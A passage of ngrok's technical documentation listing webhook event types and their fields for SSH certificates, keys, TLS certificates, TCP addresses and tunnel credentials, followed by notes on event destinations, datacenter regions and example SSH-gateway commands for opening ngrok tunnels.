URI of the SSH Certificate Authority API resource

+
created_atstring

timestamp when the SSH Certificate Authority API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Certificate Authority. optional, max 4096 bytes.

+
public_keystring

raw public key for this SSH Certificate Authority

+
key_typestring

the type of private key for this SSH Certificate Authority

+
+
ssh_certificate_authority_updated.v0
+

Triggers when an SSH certificate authority is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Certificate Authority

+
uristring

URI of the SSH Certificate Authority API resource

+
created_atstring

timestamp when the SSH Certificate Authority API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Certificate Authority. optional, max 4096 bytes.

+
public_keystring

raw public key for this SSH Certificate Authority

+
key_typestring

the type of private key for this SSH Certificate Authority

+
+
ssh_host_certificate_created.v0
+

Triggers when an SSH host certificate is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Host Certificate

+
uristring

URI of the SSH Host Certificate API resource

+
created_atstring

timestamp when the SSH Host Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Host Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Host Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh host certificate

+
principalsList<string>

the list of principals included in the ssh host certificate. This is the list of hostnames and/or IP addresses that are authorized to serve SSH traffic with this certificate. Dangerously, if no principals are specified, this certificate is considered valid for all hosts.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_host_certificate_deleted.v0
+

Triggers when an SSH host certificate is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Host Certificate

+
uristring

URI of the SSH Host Certificate API resource

+
created_atstring

timestamp when the SSH Host Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Host Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Host Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh host certificate

+
principalsList<string>

the list of principals included in the ssh host certificate. This is the list of hostnames and/or IP addresses that are authorized to serve SSH traffic with this certificate. Dangerously, if no principals are specified, this certificate is considered valid for all hosts.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_host_certificate_updated.v0
+

Triggers when an SSH host certificate is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Host Certificate

+
uristring

URI of the SSH Host Certificate API resource

+
created_atstring

timestamp when the SSH Host Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Host Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Host Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh host certificate

+
principalsList<string>

the list of principals included in the ssh host certificate. This is the list of hostnames and/or IP addresses that are authorized to serve SSH traffic with this certificate. Dangerously, if no principals are specified, this certificate is considered valid for all hosts.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_public_key_created.v0
+

Triggers when an SSH public key is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique ssh credential resource identifier

+
uristring

URI of the ssh credential API resource

+
created_atstring

timestamp when the ssh credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the ssh credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this ssh credential. Optional, max 4096 bytes.

+
public_keystring

the PEM-encoded public key of the SSH keypair that will be used to authenticate

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
ssh_public_key_deleted.v0
+

Triggers when an SSH public key is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique ssh credential resource identifier

+
uristring

URI of the ssh credential API resource

+
created_atstring

timestamp when the ssh credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the ssh credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this ssh credential. Optional, max 4096 bytes.

+
public_keystring

the PEM-encoded public key of the SSH keypair that will be used to authenticate

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
ssh_public_key_updated.v0
+

Triggers when an SSH public key is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique ssh credential resource identifier

+
uristring

URI of the ssh credential API resource

+
created_atstring

timestamp when the ssh credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the ssh credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this ssh credential. Optional, max 4096 bytes.

+
public_keystring

the PEM-encoded public key of the SSH keypair that will be used to authenticate

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
ssh_user_certificate_created.v0
+

Triggers when an SSH user certificate is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH User Certificate

+
uristring

URI of the SSH User Certificate API resource

+
created_atstring

timestamp when the SSH User Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH User Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH User Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh user certificate

+
principalsList<string>

the list of principals included in the ssh user certificate. This is the list of usernames that the certificate holder may sign in as on a machine authorizing the signing certificate authority. Dangerously, if no principals are specified, this certificate may be used to log in as any user.

+
critical_optionsMap<string, string>

A map of critical options included in the certificate. Only two critical options are currently defined by OpenSSH: force-command and source-address. See the OpenSSH certificate protocol spec for additional details.

+
extensionsMap<string, string>

A map of extensions included in the certificate. Extensions are additional metadata that can be interpreted by the SSH server for any purpose. These can be used to permit or deny the ability to open a terminal, do port forwarding, x11 forwarding, and more. If unspecified, the certificate will include limited permissions with the following extension map: {"permit-pty": "", "permit-user-rc": ""} OpenSSH understands a number of predefined extensions. See the OpenSSH certificate protocol spec for additional details.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys Format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_user_certificate_deleted.v0
+

Triggers when an SSH user certificate is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH User Certificate

+
uristring

URI of the SSH User Certificate API resource

+
created_atstring

timestamp when the SSH User Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH User Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH User Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh user certificate

+
principalsList<string>

the list of principals included in the ssh user certificate. This is the list of usernames that the certificate holder may sign in as on a machine authorizing the signing certificate authority. Dangerously, if no principals are specified, this certificate may be used to log in as any user.

+
critical_optionsMap<string, string>

A map of critical options included in the certificate. Only two critical options are currently defined by OpenSSH: force-command and source-address. See the OpenSSH certificate protocol spec for additional details.

+
extensionsMap<string, string>

A map of extensions included in the certificate. Extensions are additional metadata that can be interpreted by the SSH server for any purpose. These can be used to permit or deny the ability to open a terminal, do port forwarding, x11 forwarding, and more. If unspecified, the certificate will include limited permissions with the following extension map: {"permit-pty": "", "permit-user-rc": ""} OpenSSH understands a number of predefined extensions. See the OpenSSH certificate protocol spec for additional details.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys Format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_user_certificate_updated.v0
+

Triggers when an SSH user certificate is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH User Certificate

+
uristring

URI of the SSH User Certificate API resource

+
created_atstring

timestamp when the SSH User Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH User Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH User Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh user certificate

+
principalsList<string>

the list of principals included in the ssh user certificate. This is the list of usernames that the certificate holder may sign in as on a machine authorizing the signing certificate authority. Dangerously, if no principals are specified, this certificate may be used to log in as any user.

+
critical_optionsMap<string, string>

A map of critical options included in the certificate. Only two critical options are currently defined by OpenSSH: force-command and source-address. See the OpenSSH certificate protocol spec for additional details.

+
extensionsMap<string, string>

A map of extensions included in the certificate. Extensions are additional metadata that can be interpreted by the SSH server for any purpose. These can be used to permit or deny the ability to open a terminal, do port forwarding, x11 forwarding, and more. If unspecified, the certificate will include limited permissions with the following extension map: {"permit-pty": "", "permit-user-rc": ""} OpenSSH understands a number of predefined extensions. See the OpenSSH certificate protocol spec for additional details.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys Format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
tcp_address_created.v0
+

Triggers when a TCP address is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved address resource identifier

+
uristring

URI of the reserved address API resource

+
created_atstring

timestamp when the reserved address was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved address will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved address. Optional, max 4096 bytes.

+
addrstring

hostname:port of the reserved address that was assigned at creation time

+
regionstring

reserve the address in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
+
tcp_address_deleted.v0
+

Triggers when a TCP address is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved address resource identifier

+
uristring

URI of the reserved address API resource

+
created_atstring

timestamp when the reserved address was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved address will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved address. Optional, max 4096 bytes.

+
addrstring

hostname:port of the reserved address that was assigned at creation time

+
regionstring

reserve the address in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
+
tcp_address_updated.v0
+

Triggers when a TCP address is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved address resource identifier

+
uristring

URI of the reserved address API resource

+
created_atstring

timestamp when the reserved address was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved address will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved address. Optional, max 4096 bytes.

+
addrstring

hostname:port of the reserved address that was assigned at creation time

+
regionstring

reserve the address in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
+
tcp_connection_closed.v0
+

Triggers when a TCP connection to an endpoint closes.

+

+This event type supports filters and selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
conn.client_ipstringfilterable

The source IP of the TCP connection to the ngrok edge

+
conn.end_tstimestamp

The timestamp when the TCP connection to the ngrok edge is closed

+
conn.server_ipstringfilterable

The IP address of the server that received the request

+
conn.server_namestringfilterable

The hostname associated with this connection.

+
conn.server_portint32filterable

The port that the connection for this request came in on

+
conn.start_tstimestamp

The timestamp when the TCP connection to the ngrok edge is established

+
ip_policy.decisionstring

‘allow’ if IP Policy module permitted the request to the upstream service, ‘block’ otherwise

+
+
tls_certificate_created.v0
+

Triggers when a TLS certificate is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this TLS certificate

+
uristring

URI of the TLS certificate API resource

+
created_atstring

timestamp when the TLS certificate was created, RFC 3339 format

+
descriptionstring

human-readable description of this TLS certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this TLS certificate. optional, max 4096 bytes.

+
certificate_pemstring

chain of PEM-encoded certificates, leaf first. See Certificate Bundles.

+
subject_common_namestring

subject common name from the leaf of this TLS certificate

+
subject_alternative_names.dns_namesList<string>

set of additional domains (including wildcards) this TLS certificate is valid for

+
subject_alternative_names.ipsList<string>

set of IP addresses this TLS certificate is also valid for

+
issued_atstring

timestamp (in RFC 3339 format) when this TLS certificate was issued automatically, or null if this certificate was user-uploaded

+
not_beforestring

timestamp when this TLS certificate becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this TLS certificate becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this TLS certificate can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this TLS certificate can be used for

+
private_key_typestring

type of the private key of this TLS certificate. One of rsa, ecdsa, or ed25519.

+
issuer_common_namestring

issuer common name from the leaf of this TLS certificate

+
serial_numberstring

serial number of the leaf of this TLS certificate

+
subject_organizationstring

subject organization from the leaf of this TLS certificate

+
subject_organizational_unitstring

subject organizational unit from the leaf of this TLS certificate

+
subject_localitystring

subject locality from the leaf of this TLS certificate

+
subject_provincestring

subject province from the leaf of this TLS certificate

+
subject_countrystring

subject country from the leaf of this TLS certificate

+
+
tls_certificate_deleted.v0
+

Triggers when a TLS certificate is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this TLS certificate

+
uristring

URI of the TLS certificate API resource

+
created_atstring

timestamp when the TLS certificate was created, RFC 3339 format

+
descriptionstring

human-readable description of this TLS certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this TLS certificate. optional, max 4096 bytes.

+
certificate_pemstring

chain of PEM-encoded certificates, leaf first. See Certificate Bundles.

+
subject_common_namestring

subject common name from the leaf of this TLS certificate

+
subject_alternative_names.dns_namesList<string>

set of additional domains (including wildcards) this TLS certificate is valid for

+
subject_alternative_names.ipsList<string>

set of IP addresses this TLS certificate is also valid for

+
issued_atstring

timestamp (in RFC 3339 format) when this TLS certificate was issued automatically, or null if this certificate was user-uploaded

+
not_beforestring

timestamp when this TLS certificate becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this TLS certificate becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this TLS certificate can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this TLS certificate can be used for

+
private_key_typestring

type of the private key of this TLS certificate. One of rsa, ecdsa, or ed25519.

+
issuer_common_namestring

issuer common name from the leaf of this TLS certificate

+
serial_numberstring

serial number of the leaf of this TLS certificate

+
subject_organizationstring

subject organization from the leaf of this TLS certificate

+
subject_organizational_unitstring

subject organizational unit from the leaf of this TLS certificate

+
subject_localitystring

subject locality from the leaf of this TLS certificate

+
subject_provincestring

subject province from the leaf of this TLS certificate

+
subject_countrystring

subject country from the leaf of this TLS certificate

+
+
tls_certificate_updated.v0
+

Triggers when a TLS certificate is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this TLS certificate

+
uristring

URI of the TLS certificate API resource

+
created_atstring

timestamp when the TLS certificate was created, RFC 3339 format

+
descriptionstring

human-readable description of this TLS certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this TLS certificate. optional, max 4096 bytes.

+
certificate_pemstring

chain of PEM-encoded certificates, leaf first. See Certificate Bundles.

+
subject_common_namestring

subject common name from the leaf of this TLS certificate

+
subject_alternative_names.dns_namesList<string>

set of additional domains (including wildcards) this TLS certificate is valid for

+
subject_alternative_names.ipsList<string>

set of IP addresses this TLS certificate is also valid for

+
issued_atstring

timestamp (in RFC 3339 format) when this TLS certificate was issued automatically, or null if this certificate was user-uploaded

+
not_beforestring

timestamp when this TLS certificate becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this TLS certificate becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this TLS certificate can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this TLS certificate can be used for

+
private_key_typestring

type of the private key of this TLS certificate. One of rsa, ecdsa, or ed25519.

+
issuer_common_namestring

issuer common name from the leaf of this TLS certificate

+
serial_numberstring

serial number of the leaf of this TLS certificate

+
subject_organizationstring

subject organization from the leaf of this TLS certificate

+
subject_organizational_unitstring

subject organizational unit from the leaf of this TLS certificate

+
subject_localitystring

subject locality from the leaf of this TLS certificate

+
subject_provincestring

subject province from the leaf of this TLS certificate

+
subject_countrystring

subject country from the leaf of this TLS certificate

+
+
tunnel_credential_created.v0
+

Triggers when a tunnel credential is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique tunnel credential resource identifier

+
uristring

URI of the tunnel credential API resource

+
created_atstring

timestamp when the tunnel credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this credential. Optional, max 4096 bytes.

+
tokenstring

the credential’s authtoken that can be used to authenticate an ngrok client. This value is only available one time, on the API response from credential creation, otherwise it is null.

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
tunnel_credential_deleted.v0
+

Triggers when a tunnel credential is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique tunnel credential resource identifier

+
uristring

URI of the tunnel credential API resource

+
created_atstring

timestamp when the tunnel credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this credential. Optional, max 4096 bytes.

+
tokenstring

the credential’s authtoken that can be used to authenticate an ngrok client. This value is only available one time, on the API response from credential creation, otherwise it is null.

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
tunnel_credential_updated.v0
+

Triggers when a tunnel credential is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique tunnel credential resource identifier

+
uristring

URI of the tunnel credential API resource

+
created_atstring

timestamp when the tunnel credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this credential. Optional, max 4096 bytes.

+
tokenstring

the credential’s authtoken that can be used to authenticate an ngrok client. This value is only available one time, on the API response from credential creation, otherwise it is null.

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+

Event Destinations

+

An Event Destination specifies a service and any required configuration for it to receive Events data. You can send a set of Events to one or more Destinations. Currently, you can configure your Destinations to send Events to the following services:

+
    +
  • AWS CloudWatch Logs
  • +
  • AWS Kinesis Data Streams
  • +
  • AWS Kinesis Firehose Delivery Streams
  • +
+

Note that Kinesis Firehose can deliver events into an S3 bucket.

+

Events Payloads

+

Events are sent as JSON to configured destinations. All events include the following fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
NameDescriptionExample
event_idunique identifier for this event, always prefixed with ev_ev_1vPlyBW3OR44bpPphS4HIZyajDD
event_typeidentifies the object, action, and version of the eventip_policy_created.v0
event_timestamptimestamp of when the event fired in RFC 3339 format2021-07-16T21:44:37Z
objecta json object describing the resource where the event occurred{
+ "id": "ipp_1vPlyF4iyQj82hjSv67dRkV8woI",
+ "uri": "https://api.ngrok.com/ip_policies/ipp_1vPlyF4iyQj82hjSv67dRkV8woI",
+ "created_at": "2021-07-16T21:44:16Z",
+ "description": "bar",
+ "metadata": "",
+ "action": "allow"
+ }
+ +

Global infrastructure

+

ngrok runs globally distributed tunnel servers around the world to enable fast, low latency traffic + to your applications. +

+

Locations

+

ngrok runs tunnel servers in datacenters around the world. The location of the datacenter within + a given region may change without notice (e.g. the European servers may move from Frankfurt to London). +

+
    +
  • +
    us - United States (Ohio)
    +
  • +
  • +
    eu - Europe (Frankfurt)
    +
  • +
  • +
    ap - Asia/Pacific (Singapore)
    +
  • +
  • +
    au - Australia (Sydney)
    +
  • +
  • +
    sa - South America (Sao Paulo)
    +
  • +
  • +
    jp - Japan (Tokyo)
    +
  • +
  • +
    in - India (Mumbai)
    +
  • +
+

Usage

+

If you do not explicitly pick a region, your tunnel will be hosted in the default region, the United States. Picking the region closest to you is as easy as setting the -region command line flag or setting the region property in your configuration file. For example, to start a tunnel in the Europe region:

+
+
ngrok http -region eu 8080
+
+

Reserved domains and reserved addresses are allocated for a specific region (the US region by default). When you reserve a domain or address, you must select a target region. You may not bind a domain or address in a region other than the one it was allocated for. Attempting to do so will yield an error and prevent your tunnel session from initializing.

+

Limitations

+

An ngrok client may only be connected to a single region. This may change in the future, but at the moment a single ngrok client cannot host tunnels in multiple regions simultaneously. Run multiple ngrok clients if you need to do this.

+

A domain cannot be reserved for multiple regions simultaneously. It is not possible to geo-balance DNS + to the same tunnel name in multiple regions. Use region-specific subdomains or TLDs if you need to do this + (eu.tunnel.example.com, us.tunnel.example.com, etc). +

+ +

SSH Gateway

+

SSH reverse tunneling is an alternative mechanism to start an ngrok tunnel without even needing to download + or run the ngrok client. You can start tunnels via SSH without downloading an ngrok client by running an SSH reverse tunnel + command. +

+

The SSH gateway functionality should not be confused with exposing an SSH server via ngrok. If you want to expose your own SSH + server for remote access, please refer to the documentation on TCP tunnels. +

+

Uploading a Public Key

+

Before you can start a tunnel via the SSH gateway, you'll need to upload your SSH public key. To upload your SSH public key, open the file + ~/.ssh/id_rsa.pub and copy its contents. Then go to the Auth tab on your dashboard and paste the contents + into the SSH Key input and optionally enter a human description (like the name of your machine). You should now be able to start SSH tunnels! +

+
Copy your SSH public key on Mac OS X
+
+
cat ~/.ssh/id_rsa.pub | pbcopy
+
+
Add your SSH key by pasting it into the ngrok dashboard.
+ +

Examples

+

+ ngrok tries to honor the syntax of ssh -R for all of the tunnel commands in its SSH gateway. You may wish to consult man ssh, + and the section devoted to the -R option for additional details. ngrok uses additional command line options to implement features that are + not otherwise available via the -R syntax. +

+

+ The following examples demonstrate how to use the SSH gateway and provide the equivalent ngrok client command to help + you best understand how to achieve similar functionality. +

+ +
Start an http tunnel forwarding to port 80
+
+
# equivalent: `ngrok http 80`
+ssh -R 80:localhost:80 tunnel.us.ngrok.com http
+
+
Start an http tunnel on a custom subdomain forwarding to port 8080
+
+
# equivalent: `ngrok http -subdomain=custom-subdomain 8080`
+ssh -R custom-subdomain.ngrok.io:80:localhost:8080 tunnel.us.ngrok.com http
+
+
Start an http tunnel on a custom domain with auth
+
+
# equivalent: `ngrok http -hostname=example.com 8080`
+ssh -R example.com:80:localhost:8080 tunnel.us.ngrok.com http -auth="user:password"
+
+
Start a TCP tunnel
+
+
# equivalent: `ngrok tcp 22`
+ssh -R 0:localhost:22 tunnel.us.ngrok.com tcp 22
+
+
Start a TCP tunnel on a reserved address
+
+
# equivalent: `ngrok tcp --remote-addr=1.tcp.ngrok.io:24313 22`
+ssh -R 1.tcp.ngrok.io:24313:localhost:22 tunnel.us.ngrok.com tcp
+
+
Start a TLS tunnel
+
+
# equivalent: `ngrok tls 8443`
+ssh -R 443:localhost:8443 tunnel.us.ngrok.com tls
+
+
Start a tunnel in a different region
+
+
# equivalent: `ngrok http -region=eu 80`
